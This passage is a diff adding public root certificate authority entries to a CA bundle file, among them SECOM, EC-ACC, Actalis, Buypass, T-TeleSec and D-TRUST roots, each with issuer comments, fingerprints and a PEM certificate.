+aWNhdGlvbiBBdXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB +AQCwfnK4pAOU5qfeCTiRShFAh6d8WWQUe7UREN3+v9XAu1bihSX0NXIP+FPQQeFE +AcK0HMMxQhZHhTMidrIKbw/lJVBPhYa+v5guEGcevhEFhgWQxFnQfHgQsIBct+HH +K3XLfJ+utdGdIzdjp9xCoi2SBBtQwXu4PhvJVgSLL1KbralW6cH/ralYhzC2gfeX +RfwZVzsrb+RH9JlF/h3x+JejiB03HFyP4HYlmlD4oFT/RJB2I9IyxsOrBr/8+7/z +rX2SYgJbKdM1o5OaQ2RgXbL6Mv87BK9NQGr5x+PvI/1ry+UPizgN7gr8/g+YnzAx +3WxSZfmLgb4i4RxYA7qRG4kHAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBRqOFsmjd6LWvJPelSDGRjjCDWmujANBgkq +hkiG9w0BAQUFAAOCAQEAPNV3PdrfibqHDAhUaiBQkr6wQT25JmSDCi/oQMCXKCeC +MErJk/9q56YAf4lCmtYR5VPOL8zy2gXE/uJQxDqGfczafhAJO5I1KlOy/usrBdls +XebQ79NqZp4VKIV66IIArB6nCWlWQtNoURi+VJq/REG6Sb4gumlc7rh3zc5sH62D +lhh9DrUUOYTxKOkto557HnpyWoOzeW/vtPzQCqVYT0bf+215WfKEIlKuD8z7fDvn +aspHYcN6+NOSBB+4IIThNlQWx0DeO4pz3N/GCUzf7Nr/1FNCocnyYh0igzyXxfkZ +YiesZSLX0zzG5Y6yU8xJzrww/nsOM5D77dIUkR8Hrw== +-----END CERTIFICATE----- + +# Issuer: O=SECOM Trust Systems CO.,LTD. OU=Security Communication RootCA2 +# Subject: O=SECOM Trust Systems CO.,LTD. 
OU=Security Communication RootCA2
+# Label: "Security Communication RootCA2"
+# Serial: 0
+# MD5 Fingerprint: 6c:39:7d:a4:0e:55:59:b2:3f:d6:41:b1:12:50:de:43
+# SHA1 Fingerprint: 5f:3b:8c:f2:f8:10:b3:7d:78:b4:ce:ec:19:19:c3:73:34:b9:c7:74
+# SHA256 Fingerprint: 51:3b:2c:ec:b8:10:d4:cd:e5:dd:85:39:1a:df:c6:c2:dd:60:d8:7b:b7:36:d2:b5:21:48:4a:a4:7a:0e:be:f6
+-----BEGIN CERTIFICATE-----
+MIIDdzCCAl+gAwIBAgIBADANBgkqhkiG9w0BAQsFADBdMQswCQYDVQQGEwJKUDEl
+MCMGA1UEChMcU0VDT00gVHJ1c3QgU3lzdGVtcyBDTy4sTFRELjEnMCUGA1UECxMe
+U2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBSb290Q0EyMB4XDTA5MDUyOTA1MDAzOVoX
+DTI5MDUyOTA1MDAzOVowXTELMAkGA1UEBhMCSlAxJTAjBgNVBAoTHFNFQ09NIFRy
+dXN0IFN5c3RlbXMgQ08uLExURC4xJzAlBgNVBAsTHlNlY3VyaXR5IENvbW11bmlj
+YXRpb24gUm9vdENBMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAV
+OVKxUrO6xVmCxF1SrjpDZYBLx/KWvNs2l9amZIyoXvDjChz335c9S672XewhtUGr
+zbl+dp+++T42NKA7wfYxEUV0kz1XgMX5iZnK5atq1LXaQZAQwdbWQonCv/Q4EpVM
+VAX3NuRFg3sUZdbcDE3R3n4MqzvEFb46VqZab3ZpUql6ucjrappdUtAtCms1FgkQ
+hNBqyjoGADdH5H5XTz+L62e4iKrFvlNVspHEfbmwhRkGeC7bYRr6hfVKkaHnFtWO
+ojnflLhwHyg/i/xAXmODPIMqGplrz95Zajv8bxbXH/1KEOtOghY6rCcMU/Gt1SSw
+awNQwS08Ft1ENCcadfsCAwEAAaNCMEAwHQYDVR0OBBYEFAqFqXdlBZh8QIH4D5cs
+OPEK7DzPMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3
+DQEBCwUAA4IBAQBMOqNErLlFsceTfsgLCkLfZOoc7llsCLqJX2rKSpWeeo8HxdpF
+coJxDjrSzG+ntKEju/Ykn8sX/oymzsLS28yN/HH8AynBbF0zX2S2ZTuJbxh2ePXc
+okgfGT+Ok+vx+hfuzU7jBBJV1uXk3fs+BXziHV7Gp7yXT2g69ekuCkO2r1dcYmh8
+t/2jioSgrGK+KwmHNPBqAbubKVY8/gA3zyNs8U6qtnRGEmyR7jTV7JqR50S+kDFy
+1UkC9gLl9B/rfNmWVan/7Ir5mUf/NVoCqgTLiluHcSmRvaS0eg29mvVXIwAHIRc/
+SjnRBUkLp7Y3gaVdjKozXoEofKd9J+sAro03
+-----END CERTIFICATE-----
+
+# Issuer: CN=EC-ACC O=Agencia Catalana de Certificacio (NIF Q-0801176-I) OU=Serveis Publics de Certificacio/Vegeu https://www.catcert.net/verarrel (c)03/Jerarquia Entitats de Certificacio Catalanes
+# Subject: CN=EC-ACC O=Agencia Catalana de Certificacio (NIF Q-0801176-I) OU=Serveis Publics de Certificacio/Vegeu https://www.catcert.net/verarrel (c)03/Jerarquia Entitats de Certificacio Catalanes
+# Label: "EC-ACC"
+# Serial: -23701579247955709139626555126524820479
+# MD5 Fingerprint: eb:f5:9d:29:0d:61:f9:42:1f:7c:c2:ba:6d:e3:15:09
+# SHA1 Fingerprint: 28:90:3a:63:5b:52:80:fa:e6:77:4c:0b:6d:a7:d6:ba:a6:4a:f2:e8
+# SHA256 Fingerprint: 88:49:7f:01:60:2f:31:54:24:6a:e2:8c:4d:5a:ef:10:f1:d8:7e:bb:76:62:6f:4a:e0:b7:f9:5b:a7:96:87:99
+-----BEGIN CERTIFICATE-----
+MIIFVjCCBD6gAwIBAgIQ7is969Qh3hSoYqwE893EATANBgkqhkiG9w0BAQUFADCB
+8zELMAkGA1UEBhMCRVMxOzA5BgNVBAoTMkFnZW5jaWEgQ2F0YWxhbmEgZGUgQ2Vy
+dGlmaWNhY2lvIChOSUYgUS0wODAxMTc2LUkpMSgwJgYDVQQLEx9TZXJ2ZWlzIFB1
+YmxpY3MgZGUgQ2VydGlmaWNhY2lvMTUwMwYDVQQLEyxWZWdldSBodHRwczovL3d3
+dy5jYXRjZXJ0Lm5ldC92ZXJhcnJlbCAoYykwMzE1MDMGA1UECxMsSmVyYXJxdWlh
+IEVudGl0YXRzIGRlIENlcnRpZmljYWNpbyBDYXRhbGFuZXMxDzANBgNVBAMTBkVD
+LUFDQzAeFw0wMzAxMDcyMzAwMDBaFw0zMTAxMDcyMjU5NTlaMIHzMQswCQYDVQQG
+EwJFUzE7MDkGA1UEChMyQWdlbmNpYSBDYXRhbGFuYSBkZSBDZXJ0aWZpY2FjaW8g
+KE5JRiBRLTA4MDExNzYtSSkxKDAmBgNVBAsTH1NlcnZlaXMgUHVibGljcyBkZSBD
+ZXJ0aWZpY2FjaW8xNTAzBgNVBAsTLFZlZ2V1IGh0dHBzOi8vd3d3LmNhdGNlcnQu
+bmV0L3ZlcmFycmVsIChjKTAzMTUwMwYDVQQLEyxKZXJhcnF1aWEgRW50aXRhdHMg
+ZGUgQ2VydGlmaWNhY2lvIENhdGFsYW5lczEPMA0GA1UEAxMGRUMtQUNDMIIBIjAN
+BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsyLHT+KXQpWIR4NA9h0X84NzJB5R
+85iKw5K4/0CQBXCHYMkAqbWUZRkiFRfCQ2xmRJoNBD45b6VLeqpjt4pEndljkYRm
+4CgPukLjbo73FCeTae6RDqNfDrHrZqJyTxIThmV6PttPB/SnCWDaOkKZx7J/sxaV
+HMf5NLWUhdWZXqBIoH7nF2W4onW4HvPlQn2v7fOKSGRdghST2MDk/7NQcvJ29rNd
+QlB50JQ+awwAvthrDk4q7D7SzIKiGGUzE3eeml0aE9jD2z3Il3rucO2n5nzbcc8t
+lGLfbdb1OL4/pYUKGbio2Al1QnDE6u/LDsg0qBIimAy4E5S2S+zw0JDnJwIDAQAB
+o4HjMIHgMB0GA1UdEQQWMBSBEmVjX2FjY0BjYXRjZXJ0Lm5ldDAPBgNVHRMBAf8E
+BTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUoMOLRKo3pUW/l4Ba0fF4
+opvpXY0wfwYDVR0gBHgwdjB0BgsrBgEEAfV4AQMBCjBlMCwGCCsGAQUFBwIBFiBo
+dHRwczovL3d3dy5jYXRjZXJ0Lm5ldC92ZXJhcnJlbDA1BggrBgEFBQcCAjApGidW
+ZWdldSBodHRwczovL3d3dy5jYXRjZXJ0Lm5ldC92ZXJhcnJlbCAwDQYJKoZIhvcN
+AQEFBQADggEBAKBIW4IB9k1IuDlVNZyAelOZ1Vr/sXE7zDkJlF7W2u++AVtd0x7Y
+/X1PzaBB4DSTv8vihpw3kpBWHNzrKQXlxJ7HNd+KDM3FIUPpqojlNcAZQmNaAl6k
+SBg6hW/cnbw/nZzBh7h6YQjpdwt/cKt63dmXLGQehb+8dJahw3oS7AwaboMMPOhy
+Rp/7SNVel+axofjk70YllJyJ22k4vuxcDlbHZVHlUIiIv0LVKz3l+bqeLrPK9HOS
+Agu+TGbrIP65y7WZf+a2E/rKS03Z7lNGBjvGTq2TWoF+bCpLagVFjPIhpDGQh2xl
+nJ2lYJU6Un/10asIbvPuW/mIPX64b24D5EI=
+-----END CERTIFICATE-----
+
+# Issuer: CN=Actalis Authentication Root CA O=Actalis S.p.A./03358520967
+# Subject: CN=Actalis Authentication Root CA O=Actalis S.p.A./03358520967
+# Label: "Actalis Authentication Root CA"
+# Serial: 6271844772424770508
+# MD5 Fingerprint: 69:c1:0d:4f:07:a3:1b:c3:fe:56:3d:04:bc:11:f6:a6
+# SHA1 Fingerprint: f3:73:b3:87:06:5a:28:84:8a:f2:f3:4a:ce:19:2b:dd:c7:8e:9c:ac
+# SHA256 Fingerprint: 55:92:60:84:ec:96:3a:64:b9:6e:2a:be:01:ce:0b:a8:6a:64:fb:fe:bc:c7:aa:b5:af:c1:55:b3:7f:d7:60:66
+-----BEGIN CERTIFICATE-----
+MIIFuzCCA6OgAwIBAgIIVwoRl0LE48wwDQYJKoZIhvcNAQELBQAwazELMAkGA1UE
+BhMCSVQxDjAMBgNVBAcMBU1pbGFuMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8w
+MzM1ODUyMDk2NzEnMCUGA1UEAwweQWN0YWxpcyBBdXRoZW50aWNhdGlvbiBSb290
+IENBMB4XDTExMDkyMjExMjIwMloXDTMwMDkyMjExMjIwMlowazELMAkGA1UEBhMC
+SVQxDjAMBgNVBAcMBU1pbGFuMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1
+ODUyMDk2NzEnMCUGA1UEAwweQWN0YWxpcyBBdXRoZW50aWNhdGlvbiBSb290IENB
+MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAp8bEpSmkLO/lGMWwUKNv
+UTufClrJwkg4CsIcoBh/kbWHuUA/3R1oHwiD1S0eiKD4j1aPbZkCkpAW1V8IbInX
+4ay8IMKx4INRimlNAJZaby/ARH6jDuSRzVju3PvHHkVH3Se5CAGfpiEd9UEtL0z9
+KK3giq0itFZljoZUj5NDKd45RnijMCO6zfB9E1fAXdKDa0hMxKufgFpbOr3JpyI/
+gCczWw63igxdBzcIy2zSekciRDXFzMwujt0q7bd9Zg1fYVEiVRvjRuPjPdA1Yprb
+rxTIW6HMiRvhMCb8oJsfgadHHwTrozmSBp+Z07/T6k9QnBn+locePGX2oxgkg4YQ
+51Q+qDp2JE+BIcXjDwL4k5RHILv+1A7TaLndxHqEguNTVHnd25zS8gebLra8Pu2F
+be8lEfKXGkJh90qX6IuxEAf6ZYGyojnP9zz/GPvG8VqLWeICrHuS0E4UT1lF9gxe
+KF+w6D9Fz8+vm2/7hNN3WpVvrJSEnu68wEqPSpP4RCHiMUVhUE4Q2OM1fEwZtN4F
+v6MGn8i1zeQf1xcGDXqVdFUNaBr8EBtiZJ1t4JWgw5QHVw0U5r0F+7if5t+L4sbn
+fpb2U8WANFAoWPASUHEXMLrmeGO89LKtmyuy/uE5jF66CyCU3nuDuP/jVo23Eek7
+jPKxwV2dpAtMK9myGPW1n0sCAwEAAaNjMGEwHQYDVR0OBBYEFFLYiDrIn3hm7Ynz
+ezhwlMkCAjbQMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiIOsifeGbt
+ifN7OHCUyQICNtAwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3DQEBCwUAA4ICAQAL
+e3KHwGCmSUyIWOYdiPcUZEim2FgKDk8TNd81HdTtBjHIgT5q1d07GjLukD0R0i70
+jsNjLiNmsGe+b7bAEzlgqqI0JZN1Ut6nna0Oh4lScWoWPBkdg/iaKWW+9D+a2fDz
+WochcYBNy+A4mz+7+uAwTc+G02UQGRjRlwKxK3JCaKygvU5a2hi/a5iB0P2avl4V
+SM0RFbnAKVy06Ij3Pjaut2L9HmLecHgQHEhb2rykOLpn7VU+Xlff1ANATIGk0k9j
+pwlCCRT8AKnCgHNPLsBA2RF7SOp6AsDT6ygBJlh0wcBzIm2Tlf05fbsq4/aC4yyX
+X04fkZT6/iyj2HYauE2yOE+b+h1IYHkm4vP9qdCa6HCPSXrW5b0KDtst842/6+Ok
+fcvHlXHo2qN8xcL4dJIEG4aspCJTQLas/kx2z/uUMsA1n3Y/buWQbqCmJqK4LL7R
+K4X9p2jIugErsWx0Hbhzlefut8cl8ABMALJ+tguLHPPAUJ4lueAI3jZm/zel0btU
+ZCzJJ7VLkn5l/9Mt4blOvH+kQSGQQXemOR/qnuOf0GZvBeyqdn6/axag67XH/JJU
+LysRJyU3eExRarDzzFhdFPFqSBX/wge2sY0PjlxQRrM9vwGYT7JZVEc+NHt4bVaT
+LnPqZih4zR0Uv6CPLy64Lo7yFIrM6bV8+2ydDKXhlg==
+-----END CERTIFICATE-----
+
+# Issuer: CN=Buypass Class 2 Root CA O=Buypass AS-983163327
+# Subject: CN=Buypass Class 2 Root CA O=Buypass AS-983163327
+# Label: "Buypass Class 2 Root CA"
+# Serial: 2
+# MD5 Fingerprint: 46:a7:d2:fe:45:fb:64:5a:a8:59:90:9b:78:44:9b:29
+# SHA1 Fingerprint: 49:0a:75:74:de:87:0a:47:fe:58:ee:f6:c7:6b:eb:c6:0b:12:40:99
+# SHA256 Fingerprint: 9a:11:40:25:19:7c:5b:b9:5d:94:e6:3d:55:cd:43:79:08:47:b6:46:b2:3c:df:11:ad:a4:a0:0e:ff:15:fb:48
+-----BEGIN CERTIFICATE-----
+MIIFWTCCA0GgAwIBAgIBAjANBgkqhkiG9w0BAQsFADBOMQswCQYDVQQGEwJOTzEd
+MBsGA1UECgwUQnV5cGFzcyBBUy05ODMxNjMzMjcxIDAeBgNVBAMMF0J1eXBhc3Mg
+Q2xhc3MgMiBSb290IENBMB4XDTEwMTAyNjA4MzgwM1oXDTQwMTAyNjA4MzgwM1ow
+TjELMAkGA1UEBhMCTk8xHTAbBgNVBAoMFEJ1eXBhc3MgQVMtOTgzMTYzMzI3MSAw
+HgYDVQQDDBdCdXlwYXNzIENsYXNzIDIgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEB
+BQADggIPADCCAgoCggIBANfHXvfBB9R3+0Mh9PT1aeTuMgHbo4Yf5FkNuud1g1Lr
+6hxhFUi7HQfKjK6w3Jad6sNgkoaCKHOcVgb/S2TwDCo3SbXlzwx87vFKu3MwZfPV
+L4O2fuPn9Z6rYPnT8Z2SdIrkHJasW4DptfQxh6NR/Md+oW+OU3fUl8FVM5I+GC91
+1K2GScuVr1QGbNgGE41b/+EmGVnAJLqBcXmQRFBoJJRfuLMR8SlBYaNByyM21cHx
+MlAQTn/0hpPshNOOvEu/XAFOBz3cFIqUCqTqc/sLUegTBxj6DvEr0VQVfTzh97QZ
+QmdiXnfgolXsttlpF9U6r0TtSsWe5HonfOV116rLJeffawrbD02TTqigzXsu8lkB
+arcNuAeBfos4GzjmCleZPe4h6KP1DBbdi+w0jpwqHAAVF41og9JwnxgIzRFo1clr
+Us3ERo/ctfPYV3Me6ZQ5BL/T3jjetFPsaRyifsSP5BtwrfKi+fv3FmRmaZ9JUaLi
+FRhnBkp/1Wy1TbMz4GHrXb7pmA8y1x1LPC5aAVKRCfLf6o3YBkBjqhHk/sM3nhRS
+P/TizPJhk9H9Z2vXUq6/aKtAQ6BXNVN48FP4YUIHZMbXb5tMOA1jrGKvNouicwoN
+9SG9dKpN6nIDSdvHXx1iY8f93ZHsM+71bbRuMGjeyNYmsHVee7QHIJihdjK4TWxP
+AgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMmAd+BikoL1Rpzz
+uvdMw964o605MA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAU18h
+9bqwOlI5LJKwbADJ784g7wbylp7ppHR/ehb8t/W2+xUbP6umwHJdELFx7rxP462s
+A20ucS6vxOOto70MEae0/0qyexAQH6dXQbLArvQsWdZHEIjzIVEpMMpghq9Gqx3t
+OluwlN5E40EIosHsHdb9T7bWR9AUC8rmyrV7d35BH16Dx7aMOZawP5aBQW9gkOLo
++fsicdl9sz1Gv7SEr5AcD48Saq/v7h56rgJKihcrdv6sVIkkLE8/trKnToyokZf7
+KcZ7XC25y2a2t6hbElGFtQl+Ynhw/qlqYLYdDnkM/crqJIByw5c/8nerQyIKx+u2
+DISCLIBrQYoIwOula9+ZEsuK1V6ADJHgJgg2SMX6OBE1/yWDLfJ6v9r9jv6ly0Us
+H8SIU653DtmadsWOLB2jutXsMq7Aqqz30XpN69QH4kj3Io6wpJ9qzo6ysmD0oyLQ
+I+uUWnpp3Q+/QFesa1lQ2aOZ4W7+jQF5JyMV3pKdewlNWudLSDBaGOYKbeaP4NK7
+5t98biGCwWg5TbSYWGZizEqQXsP6JwSxeRV0mcy+rSDeJmAc61ZRpqPq5KM/p/9h
+3PFaTWwyI0PurKju7koSCTxdccK+efrCh2gdC/1cacwG0Jp9VJkqyTkaGa9LKkPz
+Y11aWOIv4x3kqdbQCtCev9eBCfHJxyYNrJgWVqA=
+-----END CERTIFICATE-----
+
+# Issuer: CN=Buypass Class 3 Root CA O=Buypass AS-983163327
+# Subject: CN=Buypass Class 3 Root CA O=Buypass AS-983163327
+# Label: "Buypass Class 3 Root CA"
+# Serial: 2
+# MD5 Fingerprint: 3d:3b:18:9e:2c:64:5a:e8:d5:88:ce:0e:f9:37:c2:ec
+# SHA1 Fingerprint: da:fa:f7:fa:66:84:ec:06:8f:14:50:bd:c7:c2:81:a5:bc:a9:64:57
+# SHA256 Fingerprint: ed:f7:eb:bc:a2:7a:2a:38:4d:38:7b:7d:40:10:c6:66:e2:ed:b4:84:3e:4c:29:b4:ae:1d:5b:93:32:e6:b2:4d
+-----BEGIN CERTIFICATE-----
+MIIFWTCCA0GgAwIBAgIBAjANBgkqhkiG9w0BAQsFADBOMQswCQYDVQQGEwJOTzEd
+MBsGA1UECgwUQnV5cGFzcyBBUy05ODMxNjMzMjcxIDAeBgNVBAMMF0J1eXBhc3Mg
+Q2xhc3MgMyBSb290IENBMB4XDTEwMTAyNjA4Mjg1OFoXDTQwMTAyNjA4Mjg1OFow
+TjELMAkGA1UEBhMCTk8xHTAbBgNVBAoMFEJ1eXBhc3MgQVMtOTgzMTYzMzI3MSAw
+HgYDVQQDDBdCdXlwYXNzIENsYXNzIDMgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEB
+BQADggIPADCCAgoCggIBAKXaCpUWUOOV8l6ddjEGMnqb8RB2uACatVI2zSRHsJ8Y
+ZLya9vrVediQYkwiL944PdbgqOkcLNt4EemOaFEVcsfzM4fkoF0LXOBXByow9c3E
+N3coTRiR5r/VUv1xLXA+58bEiuPwKAv0dpihi4dVsjoT/Lc+JzeOIuOoTyrvYLs9
+tznDDgFHmV0ST9tD+leh7fmdvhFHJlsTmKtdFoqwNxxXnUX/iJY2v7vKB3tvh2PX
+0DJq1l1sDPGzbjniazEuOQAnFN44wOwZZoYS6J1yFhNkUsepNxz9gjDthBgd9K5c
+/3ATAOux9TN6S9ZV+AWNS2mw9bMoNlwUxFFzTWsL8TQH2xc519woe2v1n/MuwU8X
+KhDzzMro6/1rqy6any2CbgTUUgGTLT2G/H783+9CHaZr77kgxve9oKeV/afmiSTY
+zIw0bOIjL9kSGiG5VZFvC5F5GQytQIgLcOJ60g7YaEi7ghM5EFjp2CoHxhLbWNvS
+O1UQRwUVZ2J+GGOmRj8JDlQyXr8NYnon74Do29lLBlo3WiXQCBJ31G8JUJc9yB3D
+34xFMFbG02SrZvPAXpacw8Tvw3xrizp5f7NJzz3iiZ+gMEuFuZyUJHmPfWupRWgP
+K9Dx2hzLabjKSWJtyNBjYt1gD1iqj6G8BaVmos8bdrKEZLFMOVLAMLrwjEsCsLa3
+AgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFEe4zf/lb+74suwv
+Tg75JbCOPGvDMA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAACAj
+QTUEkMJAYmDv4jVM1z+s4jSQuKFvdvoWFqRINyzpkMLyPPgKn9iB5btb2iUspKdV
+cSQy9sgL8rxq+JOssgfCX5/bzMiKqr5qb+FJEMwx14C7u8jYog5kV+qi9cKpMRXS
+IGrs/CIBKM+GuIAeqcwRpTzyFrNHnfzSgCHEy9BHcEGhyoMZCCxt8l13nIoUE9Q2
+HJLw5QY33KbmkJs4j1xrG0aGQ0JfPgEHU1RdZX33inOhmlRaHylDFCfChQ+1iHsa
+O5S3HWCntZznKWlXWpuTekMwGwPXYshApqr8ZORK15FTAaggiG6cX0S5y2CBNOxv
+033aSF/rtJC8LakcC6wc1aJoIIAE1vyxjy+7SjENSoYc6+I2KSb12tjE8nVhz36u
+dmNKekBlk4f4HoCMhuWG1o8O/FMsYOgWYRqiPkN7zTlgVGr18okmAWiDSKIz6MkE
+kbIRNBE+6tBDGR8Dk5AM/1E9V/RBbuHLoL7ryWPNbczk+DaqaJ3tvV2XcEQNtg41
+3OEMXbugUZTLfhbrES+jkkXITHHZvMmZUldGL1DPvTVp9D0VzgalLA8+9oG6lLvD
+u79leNKGef9JOxqDDPDeeOzI8k1MGt6CKfjBWtrt7uYnXuhF0J0cUahoq0Tj0Itq
+4/g7u9xN12TyUb7mqqta6THuBrxzvxNiCp/HuZc=
+-----END CERTIFICATE-----
+
+# Issuer: CN=T-TeleSec GlobalRoot Class 3 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center
+# Subject: CN=T-TeleSec GlobalRoot Class 3 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center
+# Label: "T-TeleSec GlobalRoot Class 3"
+# Serial: 1
+# MD5 Fingerprint: ca:fb:40:a8:4e:39:92:8a:1d:fe:8e:2f:c4:27:ea:ef
+# SHA1 Fingerprint: 55:a6:72:3e:cb:f2:ec:cd:c3:23:74:70:19:9d:2a:be:11:e3:81:d1
+# SHA256 Fingerprint: fd:73:da:d3:1c:64:4f:f1:b4:3b:ef:0c:cd:da:96:71:0b:9c:d9:87:5e:ca:7e:31:70:7a:f3:e9:6d:52:2b:bd
+-----BEGIN CERTIFICATE-----
+MIIDwzCCAqugAwIBAgIBATANBgkqhkiG9w0BAQsFADCBgjELMAkGA1UEBhMCREUx
+KzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnByaXNlIFNlcnZpY2VzIEdtYkgxHzAd
+BgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50ZXIxJTAjBgNVBAMMHFQtVGVsZVNl
+YyBHbG9iYWxSb290IENsYXNzIDMwHhcNMDgxMDAxMTAyOTU2WhcNMzMxMDAxMjM1
+OTU5WjCBgjELMAkGA1UEBhMCREUxKzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnBy
+aXNlIFNlcnZpY2VzIEdtYkgxHzAdBgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50
+ZXIxJTAjBgNVBAMMHFQtVGVsZVNlYyBHbG9iYWxSb290IENsYXNzIDMwggEiMA0G
+CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC9dZPwYiJvJK7genasfb3ZJNW4t/zN
+8ELg63iIVl6bmlQdTQyK9tPPcPRStdiTBONGhnFBSivwKixVA9ZIw+A5OO3yXDw/
+RLyTPWGrTs0NvvAgJ1gORH8EGoel15YUNpDQSXuhdfsaa3Ox+M6pCSzyU9XDFES4
+hqX2iys52qMzVNn6chr3IhUciJFrf2blw2qAsCTz34ZFiP0Zf3WHHx+xGwpzJFu5
+ZeAsVMhg02YXP+HMVDNzkQI6pn97djmiH5a2OK61yJN0HZ65tOVgnS9W0eDrXltM
+EnAMbEQgqxHY9Bn20pxSN+f6tsIxO0rUFJmtxxr1XV/6B7h8DR/Wgx6zAgMBAAGj
+QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBS1
+A/d2O2GCahKqGFPrAyGUv/7OyjANBgkqhkiG9w0BAQsFAAOCAQEAVj3vlNW92nOy
+WL6ukK2YJ5f+AbGwUgC4TeQbIXQbfsDuXmkqJa9c1h3a0nnJ85cp4IaH3gRZD/FZ
+1GSFS5mvJQQeyUapl96Cshtwn5z2r3Ex3XsFpSzTucpH9sry9uetuUg/vBa3wW30
+6gmv7PO15wWeph6KU1HWk4HMdJP2udqmJQV0eVp+QD6CSyYRMG7hP0HHRwA11fXT
+91Q+gT3aSWqas+8QPebrb9HIIkfLzM8BMZLZGOMivgkeGj5asuRrDFR6fUNOuIml
+e9eiPZaGzPImNC1qkp2aGtAw4l1OBLBfiyB+d8E9lYLRRpo7PHi4b6HQDWSieB4p
+TpPDpFQUWw==
+-----END CERTIFICATE-----
+
+# Issuer: CN=D-TRUST Root Class 3 CA 2 2009 O=D-Trust GmbH
+# Subject: CN=D-TRUST Root Class 3 CA 2 2009 O=D-Trust GmbH
+# Label: "D-TRUST Root Class 3 CA 2 2009"
+# Serial: 623603
+# MD5 Fingerprint: cd:e0:25:69:8d:47:ac:9c:89:35:90:f7:fd:51:3d:2f
+# SHA1 Fingerprint: 58:e8:ab:b0:36:15:33:fb:80:f7:9b:1b:6d:29:d3:ff:8d:5f:00:f0
+# SHA256 Fingerprint: 49:e7:a4:42:ac:f0:ea:62:87:05:00:54:b5:25:64:b6:50:e4:f4:9e:42:e3:48:d6:aa:38:e0:39:e9:57:b1:c1
+-----BEGIN CERTIFICATE-----
+MIIEMzCCAxugAwIBAgIDCYPzMA0GCSqGSIb3DQEBCwUAME0xCzAJBgNVBAYTAkRF
+MRUwEwYDVQQKDAxELVRydXN0IEdtYkgxJzAlBgNVBAMMHkQtVFJVU1QgUm9vdCBD
+bGFzcyAzIENBIDIgMjAwOTAeFw0wOTExMDUwODM1NThaFw0yOTExMDUwODM1NTha
+ME0xCzAJBgNVBAYTAkRFMRUwEwYDVQQKDAxELVRydXN0IEdtYkgxJzAlBgNVBAMM
+HkQtVFJVU1QgUm9vdCBDbGFzcyAzIENBIDIgMjAwOTCCASIwDQYJKoZIhvcNAQEB
+BQADggEPADCCAQoCggEBANOySs96R+91myP6Oi/WUEWJNTrGa9v+2wBoqOADER03
+UAifTUpolDWzU9GUY6cgVq/eUXjsKj3zSEhQPgrfRlWLJ23DEE0NkVJD2IfgXU42
+tSHKXzlABF9bfsyjxiupQB7ZNoTWSPOSHjRGICTBpFGOShrvUD9pXRl/RcPHAY9R
+ySPocq60vFYJfxLLHLGvKZAKyVXMD9O0Gu1HNVpK7ZxzBCHQqr0ME7UAyiZsxGsM
+lFqVlNpQmvH/pStmMaTJOKDfHR+4CS7zp+hnUquVH+BGPtikw8paxTGA6Eian5Rp
+/hnd2HN8gcqW3o7tszIFZYQ05ub9VxC1X3a/L7AQDcUCAwEAAaOCARowggEWMA8G
+A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFP3aFMSfMN4hvR5COfyrYyNJ4PGEMA4G
+A1UdDwEB/wQEAwIBBjCB0wYDVR0fBIHLMIHIMIGAoH6gfIZ6bGRhcDovL2RpcmVj
+dG9yeS5kLXRydXN0Lm5ldC9DTj1ELVRSVVNUJTIwUm9vdCUyMENsYXNzJTIwMyUy
+MENBJTIwMiUyMDIwMDksTz1ELVRydXN0JTIwR21iSCxDPURFP2NlcnRpZmljYXRl
+cmV2b2NhdGlvbmxpc3QwQ6BBoD+GPWh0dHA6Ly93d3cuZC10cnVzdC5uZXQvY3Js
+L2QtdHJ1c3Rfcm9vdF9jbGFzc18zX2NhXzJfMjAwOS5jcmwwDQYJKoZIhvcNAQEL
+BQADggEBAH+X2zDI36ScfSF6gHDOFBJpiBSVYEQBrLLpME+bUMJm2H6NMLVwMeni
+acfzcNsgFYbQDfC+rAF1hM5+n02/t2A7nPPKHeJeaNijnZflQGDSNiH+0LS4F9p0
+o3/U37CYAqxva2ssJSRyoWXuJVrl5jLn8t+rSfrzkGkj2wTZ51xY/GXUl77M/C4K
+zCUqNQT4YJEVdT1B/yMfGchs64JTBKbkTCJNjYy6zltz7GRUUG3RnFX7acM2w4y8
+PIWmawomDeCTmGCufsYkl4phX5GOZpIJhzbNi5stPvZR1FDUWSi9g/LMKHtThm3Y
+Johw1+qRzT65ysCQblrGXnRl11z+o+I=
+-----END CERTIFICATE-----
+
+# Issuer: CN=D-TRUST Root Class 3 CA 2 EV 2009 O=D-Trust GmbH
+# Subject: CN=D-TRUST Root Class 3 CA 2 EV 2009 O=D-Trust GmbH
+# Label: "D-TRUST Root Class 3 CA 2 EV 2009"
+# Serial: 623604
